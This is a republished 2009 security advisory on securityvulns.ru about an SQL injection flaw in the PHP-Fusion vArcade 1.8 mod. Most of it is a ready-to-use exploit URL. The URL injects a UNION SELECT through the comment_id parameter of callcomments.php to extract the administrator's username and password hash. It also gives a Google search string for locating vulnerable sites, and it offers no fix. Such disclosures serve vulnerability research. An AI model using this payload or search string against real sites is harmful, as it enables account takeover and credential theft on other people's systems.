Computer Security

Security Advisory: PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Plunet BusinessManager failure in access controls and multiple stored cross site scripting

  PHP-Fusion Mod E-Cart Sql Injection

  PHP-Fusion Mod Members Bewerb Sql Injection

  Cross-Site Scripting vulnerability in Xaraya

From:r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:11.01.2009
Subject:PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability

----------------------------------------------------------------

Script : PHP-Fusion Mod vArcade 1.8

Type : Sql Injection Vulnerability

Risk : High

----------------------------------------------------------------

Download From : http://venue.nu/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Official Website : HTTP://FEREIDANI.IR

Our Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Sql Injection Vulnerability :

Vulnerable address :
http://[host]/[path]/infusions/varcade/callcomments.
php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,
user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/

----------------------------------------------------------------

                       Tnx : God

         HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server